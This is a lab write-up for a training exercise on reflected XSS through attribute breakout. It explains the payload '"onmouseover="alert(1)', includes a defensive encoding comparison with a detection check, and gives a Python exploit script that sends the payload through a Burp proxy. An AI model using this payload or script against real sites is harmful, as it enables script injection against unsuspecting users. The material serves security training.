XSS Lab 7
Reflected XSS into an attribute where angle brackets are HTML-encoded; inject an event handler to call alert
Reflected XSS into attribute with angle brackets HTML-encoded

This lab contains a reflected cross-site scripting (XSS) vulnerability in the blog search functionality. The application HTML-encodes angle brackets, which prevents simple `<script>`-style injections. However, the user-controlled input is reflected inside a quoted HTML attribute. By breaking out of the attribute and injecting an event handler (for example `onmouseover`), it’s possible to execute JavaScript without needing angle brackets.

The exploit uses a small attribute-injection payload that closes the attribute quote and adds an `onmouseover` event that calls `alert(1)`. After sending the payload (via an intercepted search request), verify the injection by copying the resulting URL into your browser and moving the mouse over the injected element.
How the Exploit Works

- The `search` parameter is reflected inside a quoted attribute in the HTML response.
- Angle brackets are HTML-encoded, so traditional tag injection (e.g. `<img>`) fails.
- By closing the current attribute quote and injecting an event handler, we can cause the browser to execute JavaScript.
- Payload example: `"onmouseover="alert(1)`. This closes the attribute, injects an `onmouseover` handler and keeps the remainder valid HTML.
- After sending the payload, copy the reflected URL into the browser and move the cursor over the injected element to trigger the alert.
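To make the encoding gap concrete, here is an added example (not part of the original writeup or the lab's own code) that models the two behaviours described above: a hypothetical `render_weak` that encodes only angle brackets, as the lab does, beside a hardened `render_hardened` that applies attribute-context encoding with `html.escape(quote=True)`. A parser-based check then shows that the lab's payload yields a real `onmouseover` attribute in the weak version and stays inert in the hardened one.

```python
import html
from html.parser import HTMLParser

# Payload quoted in the writeup above: closes the quoted attribute, adds a handler.
PAYLOAD = '"onmouseover="alert(1)'


def render_weak(search: str) -> str:
    # Hypothetical model of the lab's behaviour: only < and > are encoded,
    # so a double quote in the input terminates the attribute value.
    encoded = search.replace("<", "&lt;").replace(">", "&gt;")
    return f'<input type="text" name="search" value="{encoded}">'


def render_hardened(search: str) -> str:
    # Attribute-context encoding: quotes and ampersands are encoded as well,
    # so the input cannot leave the value="..." it was placed into.
    return f'<input type="text" name="search" value="{html.escape(search, quote=True)}">'


class _InputAttrs(HTMLParser):
    # Collects the attributes of the <input> element, parsed the way a browser would.
    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parse_input_attrs(markup: str) -> dict:
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def has_event_handler(markup: str) -> bool:
    # Detection check on rendered output: did any on* attribute appear on the element?
    # Parsing (rather than grepping for "onmouseover=") avoids false positives on
    # encoded text that merely contains the string inside a safe attribute value.
    return any(name.lower().startswith("on") for name in parse_input_attrs(markup))
```

Running `has_event_handler(render_weak(PAYLOAD))` returns True while the hardened rendering returns False, and the hardened output still round-trips the original search string as the `value` attribute.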
Usage

```cmd
python3 exploit.py https://<your-lab-id>.web-security-academy.net
```

Exploit
```python
import requests
import sys
import urllib3

# Disable SSL warnings for Burp Suite
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set Burp Suite proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}


def check_burp():
    # Check if Burp Suite is running and listening on the configured proxy.
    try:
        requests.get("http://127.0.0.1:8080", timeout=3)
    except requests.exceptions.RequestException:
        print("[-] Burp Suite is not running. Please start it and try again.")
        sys.exit(1)


def exploit_xss(url, payload):
    # Exploit XSS in search parameter.
    uri = f"/?search={payload}"
    res = requests.get(url + uri, verify=False, proxies=proxies)
    res.raise_for_status()
    # Show the reflected URL so it can be opened in the browser to trigger the handler.
    print(f"[*] Reflected URL: {res.url}")
    session = requests.Session()
    res = session.get(url, verify=False, proxies=proxies)
    if "Congratulations" in res.text:
        print("[+] Lab solved 🎉")
        return True
    else:
        print("[-] lab not solved.")
        return False


def main():
    # Entry point of the script.
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <url>")
        print(f"Example: python {sys.argv[0]} https://example.com")
        sys.exit(1)
    url = sys.argv[1].strip()
    # Step 1: Check Burp Suite
    check_burp()
    # Step 2: Define XSS payload
    payload = '"onmouseover="alert(1)'
    # Step 3: Attempt exploitation
    print("[*] Attempting XSS...")
    if exploit_xss(url, payload):
        print("[+] XSS successful!")
    else:
        print("[-] XSS unsuccessful.")


if __name__ == "__main__":
    main()
```